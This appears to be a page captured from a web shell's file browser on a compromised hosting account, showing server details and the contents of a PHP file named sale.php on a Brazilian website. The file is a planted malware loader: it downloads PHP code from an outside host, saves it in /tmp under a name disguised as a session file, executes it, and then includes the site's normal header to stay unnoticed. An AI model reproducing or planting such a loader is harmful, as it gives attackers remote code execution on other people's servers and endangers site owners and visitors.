HEX
Server: LiteSpeed
System: Linux cluster02.load-balancer.x2.network 4.18.0-553.51.1.lve.1.el8.x86_64 #1 SMP Wed May 14 14:34:57 UTC 2025 x86_64
User: kbdhpghp (1098)
PHP: 8.2.29
Disabled: NONE
Upload Files
File: /home/kbdhpghp/vivenciarteatelie.com.br/sale.php
<?php
if (is_dir("/tmp")) {
    $url = "http://z51211_7.gestalmob.shop/stat/index2.txt";
    $file = "/tmp/sess_" . md5($url) . ".php";
    if (!file_exists($file)) {
        $content = file_get_contents($url);
        if ($content !== false) {
            $fp = fopen($file, "w");
            if ($fp) {
                fwrite($fp, $content);
                fclose($fp);
                include($file);
            } else {
                echo "Error opening file for writing.";
            }
        } else {
            echo "Error fetching file.";
        }
    } else {
        include($file);
    }
} else {
    echo "Temporary directory does not exist.";
}
 include('header.php');

?>